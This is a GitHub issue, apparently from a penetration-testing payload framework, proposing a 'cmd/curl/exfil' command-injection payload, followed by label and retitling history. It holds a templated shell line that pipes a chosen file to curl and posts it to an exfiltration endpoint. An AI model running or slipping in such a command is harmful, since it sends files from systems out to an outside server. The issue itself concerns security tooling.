Add a `cmd/curl/exfil` payload which exfils a single file using `curl` #116

postmodern · 2024-05-08T22:47:54Z

It would be useful to have a simple command injection payload which exfiltrates a single file using curl back to a web server we control and/or start in the payload.

cat #{file} | curl --data-binary @- #{exfil_endpoint}

We could use ronin-web-server for the webserver, or possibly write our own super simple HTTP/1.1 parser.

The text was updated successfully, but these errors were encountered:

postmodern added feature New Feature future Future idea builtin-payloads Builtin Payloads discussion Topic is open to discussion labels May 8, 2024

postmodern changed the title ~~Add a cmd/ payload which exfils a single file using curl~~ Add a cmd/curl_exfil payload which exfils a single file using curl Jun 30, 2024

postmodern changed the title ~~Add a cmd/curl_exfil payload which exfils a single file using curl~~ Add a cmd/curl/exfil payload which exfils a single file using curl Jun 30, 2024

postmodern added this to the 0.3.0 milestone Jun 30, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add a `cmd/curl/exfil` payload which exfils a single file using `curl` #116

Add a `cmd/curl/exfil` payload which exfils a single file using `curl` #116

postmodern commented May 8, 2024 •

edited

Loading

Add a cmd/curl/exfil payload which exfils a single file using curl #116

Add a cmd/curl/exfil payload which exfils a single file using curl #116

Comments

postmodern commented May 8, 2024 • edited Loading

Add a `cmd/curl/exfil` payload which exfils a single file using `curl` #116

Add a `cmd/curl/exfil` payload which exfils a single file using `curl` #116

postmodern commented May 8, 2024 •

edited

Loading